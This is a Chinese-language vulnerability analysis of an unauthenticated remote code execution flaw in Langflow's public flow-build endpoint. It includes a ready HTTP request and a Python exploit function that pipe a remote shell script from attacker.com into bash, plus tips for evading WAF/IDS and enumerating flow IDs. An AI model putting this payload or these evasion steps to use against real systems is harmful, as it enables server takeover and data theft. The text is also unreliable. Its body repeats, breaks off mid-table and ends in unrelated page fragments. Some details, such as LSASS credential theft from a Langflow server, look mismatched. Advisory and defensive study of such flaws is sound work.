一、漏洞概述CVE-2026-33017是Langflow开源AI工作流框架中的一个严重安全漏洞,其核心问题在于未认证的远程代码执行。该漏洞影响Langflow 1.8.1及更早版本,攻击者无需任何身份验证即可通过特定API端点注入并执行任意Python代码,从而完全控制目标服务器。漏洞的CVSS评分高达9.3至10.0,属于最高危险等级,且在公开披露后仅20小时内就被攻击者武器化并用于野外攻击,刷新了漏洞利用速度的纪录。漏洞的技术根源位于Langflow的公开流程构建端点POST /api/v1/build_public_tmp/{flow_id}/flow。该接口设计初衷是为了方便用户快速构建和测试公共流程,因此默认设置为无需认证即可访问。然而,当攻击者向该接口发送包含恶意data参数的POST请求时,系统会直接使用攻击者提供的流程数据而非数据库中存储的合法数据。这些恶意数据中可包含任意Python代码,而Langflow在处理这些代码时,会通过exec()函数直接执行,且没有任何沙箱隔离、输入过滤或权限限制机制。这种设计缺陷导致攻击者能够轻易注入并执行恶意代码,获得服务器级别的完全控制权限。下表详细列出了CVE-2026-33017漏洞的CVSS评分维度:评分维度值说明攻击向量(AV)网络(N)攻击者可通过网络远程发起攻击攻击复杂度(AC)低(L)漏洞利用不需要特殊条件权限要求(PR)无(N)攻击者无需任何权限即可利用用户交互(UI)无(N)攻击过程不需要用户参与影响范围(C)高(H)影响系统的机密性、完整性和可用性影响程度(I)高(H)可能导致系统完全被攻破总评分9.3严重级别漏洞该漏洞于2026年3月17日由官方披露,美国网络安全与基础设施安全局(CISA)在3月25日将其列入"已知被利用漏洞"目录,并要求联邦机构在2026年4月8日前完成修复,这一通常为30-60天的缓冲期被缩短至14天,凸显了漏洞的紧急性和严重性。Langflow作为一款流行的AI工作流可视化开发工具,在GitHub上拥有超过14.5万星标,被广泛应用于互联网、金融、医疗、政务、工业制造等多个关键领域,其低代码、拖拽式的设计特性虽然降低了AI应用的开发门槛,但也导致大量实例被部署在可直接访问的位置,进一步扩大了攻击面。二、技术原理深度分析CVE-2026-33017漏洞的技术根源在于Langflow的公开流程构建端点设计存在三大致命缺陷:无认证设计、参数覆盖缺陷和无沙箱代码执行。这些缺陷相互叠加,形成了一个完美的攻击链,使攻击者能够轻易实现未认证远程代码执行。(一)漏洞触发点分析漏洞的核心触发点位于POST /api/v1/build_public_tmp/{flow_id}/flow端点。该端点原本设计用于构建公共流程,因此默认关闭身份认证机制,允许任何用户访问。在正常情况下,该端点应该只从数据库中加载已存储的合法流程数据,但实现中存在一个严重缺陷:当请求中包含可选的data参数时,系统会直接使用攻击者提供的流程数据,而非数据库中的合法数据。这种设计缺陷为攻击者提供了注入恶意代码的入口。以下是一个简化的代码示例,展示了漏洞触发点的逻辑:@app.route('/api/v1/build_public_tmp/flow_id/flow', methods=['POST'])def build_public_tmp_flow(flow_id): try: # 正常情况:从数据库加载流程数据 flow_data = load_flow_from_database(flow_id) # 漏洞点:如果请求包含data参数,则使用攻击者提供的数据 if 'data' in request.json: flow_data = request.json['data'] # 危险:直接使用用户输入 # 构建流程 result = build_flow(flow_data) return jsonify({'success': True, 'result': result}) except Exception as e: return jsonify({'success': False, 'error': str(e)})这段代码的核心问题在于没有对data参数进行任何安全验证,直接将其传递给build_flow函数。而build_flow函数内部会调用exec()执行流程中包含的Python代码,且没有任何沙箱保护机制。(二)代码执行机制分析Langflow在处理流程数据时,会将用户提供的节点定义转换为可执行的Python代码。这个过程涉及多个函数调用,最终通过exec()函数执行恶意代码。具体执行链如下:请求处理:build_public_tmp_flow接收包含恶意data参数的POST请求数据解析:build_flow函数解析JSON格式的流程数据图构建:create_graph函数根据流程数据创建执行图节点实例化:instantiate_component函数实例化每个节点代码执行:eval_custom_component_code函数调用exec()执行节点中的自定义代码以下代码片段展示了恶意代码的执行过程:def eval_custom_component_code(component_data): try: # 从组件数据中提取自定义代码 custom_code = component_data.get('custom_code', '') # 漏洞点:直接执行用户提供的代码,没有任何安全检查 if custom_code: exec(custom_code) # 危险:直接执行任意Python代码 return True except Exception as e: logger.error(f"执行自定义代码失败: {e}") return False这种直接调用exec()函数的设计存在严重的安全隐患,因为exec()会执行传入的任何Python代码,包括系统命令、文件操作、网络请求等危险操作。更严重的是,整个过程没有任何沙箱隔离、权限限制或输入过滤机制,攻击者可以执行任何系统命令。(三)攻击链技术分析攻击者利用CVE-2026-33017漏洞的攻击链极为简单,仅需三步即可完成攻击:目标发现:攻击者首先通过网络扫描发现暴露的Langflow实例。常用的扫描工具包括Nmap、Masscan等,扫描目标通常是TCP 8080端口(Langflow默认端口)。漏洞验证:发现目标后,攻击者发送探测性请求,验证目标是否存在CVE-2026-33017漏洞。探测请求通常包含一个简单的序列化对象,观察目标系统的响应。漏洞利用:一旦确认目标存在漏洞,攻击者向目标的/api/v1/build_public_tmp/{flow_id}/flow端点发送包含恶意Python代码的POST请求。请求格式如下:POST /api/v1/build_public_tmp/123456/flow HTTP/1.1Host: target-langflow:8080Content-Type: application/jsonContent-Length: [payload长度]{ "data": { "nodes": [ { "id": "malicious_node", "type": "CustomComponent", "custom_code": "import os; os.system('curl http://attacker.com/shell.sh | bash')" } ] }}代码执行:当Langflow处理该请求时,会调用exec()函数执行恶意代码,攻击者成功接管系统。整个攻击过程的技术实现可以用以下伪代码表示:import requestsimport jsondef exploit_langflow(target_ip, target_port=8080): # 构造恶意载荷 malicious_code = "import os; os.system('curl http://attacker.com/shell.sh | bash')" payload = { "data": { "nodes": [ { "id": "malicious_node", "type": "CustomComponent", "custom_code": malicious_code } ] } } # 发送恶意请求 url = f"http://{target_ip}:{target_port}/api/v1/build_public_tmp/123456/flow" headers = {"Content-Type": "application/json"} response = requests.post(url, json=payload, headers=headers) if response.status_code == 200: print("攻击成功") else: print("攻击失败")这种攻击方式的技术危害性极高,因为:攻击门槛低:不需要任何专业知识或特殊工具,基本的网络知识即可实施攻击攻击效率高:单次尝试即可成功,不需要多次尝试或暴力破解隐蔽性强:攻击流量看起来像正常的API请求,难以被传统安全设备检测影响范围广:一旦成功,攻击者可以控制整个Langflow服务器,进而访问或修改文件、窃取配置信息、推送恶意固件更新等(四)漏洞利用的技术难点与绕过技术虽然CVE-2026-33017漏洞的利用原理相对直接,但在实际攻击过程中,攻击者可能面临一些技术难点,需要采用相应的绕过技术:流程ID猜测:攻击者需要猜测或枚举有效的流程ID才能触发漏洞。Langflow的流程ID通常是UUID格式,攻击者可以通过以下方式绕过:使用常见或默认的流程ID通过其他未认证端点获取流程列表使用暴力破解工具枚举可能的ID代码长度限制:某些Langflow版本可能对自定义代码的长度有限制。攻击者可以通过以下方式绕过:使用短小精悍的恶意代码分段执行多个短代码使用代码混淆技术减少代码长度执行环境限制:某些部署环境可能限制了Python的某些模块或系统命令。攻击者可以通过以下方式绕过:使用Python内置模块而非系统命令利用环境变量或配置文件中的敏感信息使用DNS隧道等隐蔽通信方式安全防护措施:某些Langflow部署可能启用了Web应用防火墙(WAF)或入侵检测系统(IDS),能够检测和阻止已知的攻击模式。攻击者可以通过以下方式绕过这些防护:使用非常规的攻击载荷对攻击载荷进行加密或编码分片传输攻击载荷利用HTTP协议的其他特性(如分块传输编码)尽管存在这些技术难点,CVE-2026-33017漏洞的攻击门槛仍然相对较低,因为Langflow的Web管理界面直接调用exec()方法而没有进行任何安全检查,这为攻击者提供了极大的灵活性。一旦攻击者成功利用该漏洞,不仅可以获取Langflow设备的完全控制权,还能通过LSASS进程窃取凭证、导出数据库中的敏感数据,进而横向移动到其他服务器和终端,最终实现整个企业网络环境的完全接管。三、影响范围与在野利用评估CVE-2026-33017漏洞的影响范围极为广泛,不仅涉及全球众多企业和政府机构的Langflow部署,而且已被高级持续性威胁组织在野利用。通过深入分析其影响范围和实际威胁,可以更准确地评估该漏洞对全球网络安全的危害程度。(一)受影响产品与版本范围CVE-2026-33017漏洞影响所有当前受支持的Langflow版本,包括本地部署和云端版本,与具体配置无关。Langflow官方已在1.9.0.dev8及以上版本中修复了该漏洞,修复版本涵盖1.8.1至1.9.0版本范围。具体受影响版本及对应的修复版本如下表所示:受影响版本修复版本1.8.1及之前所有版本1.9.0.dev81.8.01.9.0.dev81.7.01.9.0.dev81.6.01.9.0.dev8值得注意的是,该漏洞不仅影响本地部署的Langflow解决方案,还包括云端版本和容器化部署。这意味着无论是企业内部部署、云服务提供商还是政府机构,只要使用受影响的Langflow产品版本,都面临安全风险。Langflow官方表示,该漏洞与具体配置无关,无论部署设置如何,存在漏洞的系统都会暴露在风险之中。(二)全球影响范围分析根据Shodan和Censys的最新数据,截至2026年5月20日,全球范围内有超过6,416个公网暴露的Langflow实例部署,其中约65%(4,170+个)运行受影响版本,截至2026年5月20日,仅23%的实例已完成修复。按地区分布来看:地区受影响设备数量
CVE-2026-33017漏洞详解:Langflow未授权远程代码执行漏洞技术分析与防护指南
发布时间:2026/6/11 18:42:20
一、漏洞概述CVE-2026-33017是Langflow开源AI工作流框架中的一个严重安全漏洞,其核心问题在于未认证的远程代码执行。该漏洞影响Langflow 1.8.1及更早版本,攻击者无需任何身份验证即可通过特定API端点注入并执行任意Python代码,从而完全控制目标服务器。漏洞的CVSS评分高达9.3至10.0,属于最高危险等级,且在公开披露后仅20小时内就被攻击者武器化并用于野外攻击,刷新了漏洞利用速度的纪录。漏洞的技术根源位于Langflow的公开流程构建端点POST /api/v1/build_public_tmp/{flow_id}/flow。该接口设计初衷是为了方便用户快速构建和测试公共流程,因此默认设置为无需认证即可访问。然而,当攻击者向该接口发送包含恶意data参数的POST请求时,系统会直接使用攻击者提供的流程数据而非数据库中存储的合法数据。这些恶意数据中可包含任意Python代码,而Langflow在处理这些代码时,会通过exec()函数直接执行,且没有任何沙箱隔离、输入过滤或权限限制机制。这种设计缺陷导致攻击者能够轻易注入并执行恶意代码,获得服务器级别的完全控制权限。下表详细列出了CVE-2026-33017漏洞的CVSS评分维度:评分维度值说明攻击向量(AV)网络(N)攻击者可通过网络远程发起攻击攻击复杂度(AC)低(L)漏洞利用不需要特殊条件权限要求(PR)无(N)攻击者无需任何权限即可利用用户交互(UI)无(N)攻击过程不需要用户参与影响范围(C)高(H)影响系统的机密性、完整性和可用性影响程度(I)高(H)可能导致系统完全被攻破总评分9.3严重级别漏洞该漏洞于2026年3月17日由官方披露,美国网络安全与基础设施安全局(CISA)在3月25日将其列入"已知被利用漏洞"目录,并要求联邦机构在2026年4月8日前完成修复,这一通常为30-60天的缓冲期被缩短至14天,凸显了漏洞的紧急性和严重性。Langflow作为一款流行的AI工作流可视化开发工具,在GitHub上拥有超过14.5万星标,被广泛应用于互联网、金融、医疗、政务、工业制造等多个关键领域,其低代码、拖拽式的设计特性虽然降低了AI应用的开发门槛,但也导致大量实例被部署在可直接访问的位置,进一步扩大了攻击面。二、技术原理深度分析CVE-2026-33017漏洞的技术根源在于Langflow的公开流程构建端点设计存在三大致命缺陷:无认证设计、参数覆盖缺陷和无沙箱代码执行。这些缺陷相互叠加,形成了一个完美的攻击链,使攻击者能够轻易实现未认证远程代码执行。(一)漏洞触发点分析漏洞的核心触发点位于POST /api/v1/build_public_tmp/{flow_id}/flow端点。该端点原本设计用于构建公共流程,因此默认关闭身份认证机制,允许任何用户访问。在正常情况下,该端点应该只从数据库中加载已存储的合法流程数据,但实现中存在一个严重缺陷:当请求中包含可选的data参数时,系统会直接使用攻击者提供的流程数据,而非数据库中的合法数据。这种设计缺陷为攻击者提供了注入恶意代码的入口。以下是一个简化的代码示例,展示了漏洞触发点的逻辑:@app.route('/api/v1/build_public_tmp/flow_id/flow', methods=['POST'])def build_public_tmp_flow(flow_id): try: # 正常情况:从数据库加载流程数据 flow_data = load_flow_from_database(flow_id) # 漏洞点:如果请求包含data参数,则使用攻击者提供的数据 if 'data' in request.json: flow_data = request.json['data'] # 危险:直接使用用户输入 # 构建流程 result = build_flow(flow_data) return jsonify({'success': True, 'result': result}) except Exception as e: return jsonify({'success': False, 'error': str(e)})这段代码的核心问题在于没有对data参数进行任何安全验证,直接将其传递给build_flow函数。而build_flow函数内部会调用exec()执行流程中包含的Python代码,且没有任何沙箱保护机制。(二)代码执行机制分析Langflow在处理流程数据时,会将用户提供的节点定义转换为可执行的Python代码。这个过程涉及多个函数调用,最终通过exec()函数执行恶意代码。具体执行链如下:请求处理:build_public_tmp_flow接收包含恶意data参数的POST请求数据解析:build_flow函数解析JSON格式的流程数据图构建:create_graph函数根据流程数据创建执行图节点实例化:instantiate_component函数实例化每个节点代码执行:eval_custom_component_code函数调用exec()执行节点中的自定义代码以下代码片段展示了恶意代码的执行过程:def eval_custom_component_code(component_data): try: # 从组件数据中提取自定义代码 custom_code = component_data.get('custom_code', '') # 漏洞点:直接执行用户提供的代码,没有任何安全检查 if custom_code: exec(custom_code) # 危险:直接执行任意Python代码 return True except Exception as e: logger.error(f"执行自定义代码失败: {e}") return False这种直接调用exec()函数的设计存在严重的安全隐患,因为exec()会执行传入的任何Python代码,包括系统命令、文件操作、网络请求等危险操作。更严重的是,整个过程没有任何沙箱隔离、权限限制或输入过滤机制,攻击者可以执行任何系统命令。(三)攻击链技术分析攻击者利用CVE-2026-33017漏洞的攻击链极为简单,仅需三步即可完成攻击:目标发现:攻击者首先通过网络扫描发现暴露的Langflow实例。常用的扫描工具包括Nmap、Masscan等,扫描目标通常是TCP 8080端口(Langflow默认端口)。漏洞验证:发现目标后,攻击者发送探测性请求,验证目标是否存在CVE-2026-33017漏洞。探测请求通常包含一个简单的序列化对象,观察目标系统的响应。漏洞利用:一旦确认目标存在漏洞,攻击者向目标的/api/v1/build_public_tmp/{flow_id}/flow端点发送包含恶意Python代码的POST请求。请求格式如下:POST /api/v1/build_public_tmp/123456/flow HTTP/1.1Host: target-langflow:8080Content-Type: application/jsonContent-Length: [payload长度]{ "data": { "nodes": [ { "id": "malicious_node", "type": "CustomComponent", "custom_code": "import os; os.system('curl http://attacker.com/shell.sh | bash')" } ] }}代码执行:当Langflow处理该请求时,会调用exec()函数执行恶意代码,攻击者成功接管系统。整个攻击过程的技术实现可以用以下伪代码表示:import requestsimport jsondef exploit_langflow(target_ip, target_port=8080): # 构造恶意载荷 malicious_code = "import os; os.system('curl http://attacker.com/shell.sh | bash')" payload = { "data": { "nodes": [ { "id": "malicious_node", "type": "CustomComponent", "custom_code": malicious_code } ] } } # 发送恶意请求 url = f"http://{target_ip}:{target_port}/api/v1/build_public_tmp/123456/flow" headers = {"Content-Type": "application/json"} response = requests.post(url, json=payload, headers=headers) if response.status_code == 200: print("攻击成功") else: print("攻击失败")这种攻击方式的技术危害性极高,因为:攻击门槛低:不需要任何专业知识或特殊工具,基本的网络知识即可实施攻击攻击效率高:单次尝试即可成功,不需要多次尝试或暴力破解隐蔽性强:攻击流量看起来像正常的API请求,难以被传统安全设备检测影响范围广:一旦成功,攻击者可以控制整个Langflow服务器,进而访问或修改文件、窃取配置信息、推送恶意固件更新等(四)漏洞利用的技术难点与绕过技术虽然CVE-2026-33017漏洞的利用原理相对直接,但在实际攻击过程中,攻击者可能面临一些技术难点,需要采用相应的绕过技术:流程ID猜测:攻击者需要猜测或枚举有效的流程ID才能触发漏洞。Langflow的流程ID通常是UUID格式,攻击者可以通过以下方式绕过:使用常见或默认的流程ID通过其他未认证端点获取流程列表使用暴力破解工具枚举可能的ID代码长度限制:某些Langflow版本可能对自定义代码的长度有限制。攻击者可以通过以下方式绕过:使用短小精悍的恶意代码分段执行多个短代码使用代码混淆技术减少代码长度执行环境限制:某些部署环境可能限制了Python的某些模块或系统命令。攻击者可以通过以下方式绕过:使用Python内置模块而非系统命令利用环境变量或配置文件中的敏感信息使用DNS隧道等隐蔽通信方式安全防护措施:某些Langflow部署可能启用了Web应用防火墙(WAF)或入侵检测系统(IDS),能够检测和阻止已知的攻击模式。攻击者可以通过以下方式绕过这些防护:使用非常规的攻击载荷对攻击载荷进行加密或编码分片传输攻击载荷利用HTTP协议的其他特性(如分块传输编码)尽管存在这些技术难点,CVE-2026-33017漏洞的攻击门槛仍然相对较低,因为Langflow的Web管理界面直接调用exec()方法而没有进行任何安全检查,这为攻击者提供了极大的灵活性。一旦攻击者成功利用该漏洞,不仅可以获取Langflow设备的完全控制权,还能通过LSASS进程窃取凭证、导出数据库中的敏感数据,进而横向移动到其他服务器和终端,最终实现整个企业网络环境的完全接管。三、影响范围与在野利用评估CVE-2026-33017漏洞的影响范围极为广泛,不仅涉及全球众多企业和政府机构的Langflow部署,而且已被高级持续性威胁组织在野利用。通过深入分析其影响范围和实际威胁,可以更准确地评估该漏洞对全球网络安全的危害程度。(一)受影响产品与版本范围CVE-2026-33017漏洞影响所有当前受支持的Langflow版本,包括本地部署和云端版本,与具体配置无关。Langflow官方已在1.9.0.dev8及以上版本中修复了该漏洞,修复版本涵盖1.8.1至1.9.0版本范围。具体受影响版本及对应的修复版本如下表所示:受影响版本修复版本1.8.1及之前所有版本1.9.0.dev81.8.01.9.0.dev81.7.01.9.0.dev81.6.01.9.0.dev8值得注意的是,该漏洞不仅影响本地部署的Langflow解决方案,还包括云端版本和容器化部署。这意味着无论是企业内部部署、云服务提供商还是政府机构,只要使用受影响的Langflow产品版本,都面临安全风险。Langflow官方表示,该漏洞与具体配置无关,无论部署设置如何,存在漏洞的系统都会暴露在风险之中。(二)全球影响范围分析根据Shodan和Censys的最新数据,截至2026年5月20日,全球范围内有超过6,416个公网暴露的Langflow实例部署,其中约65%(4,170+个)运行受影响版本,截至2026年5月20日,仅23%的实例已完成修复。按地区分布来看:地区受影响设备数量
![超星学习通签到神器:6大签到类型全自动处理,解放你的学习时间 [特殊字符]](http://pic.xiahunao.cn/yaotu/超星学习通签到神器:6大签到类型全自动处理,解放你的学习时间 [特殊字符])
)
:Compose 中的动画 —— 从简单过渡到复杂交互引言:动画让应用活起来在之前的教程中,我们零散地使用过动画:点击按钮的缩放效果、列表项进入的淡入淡出)
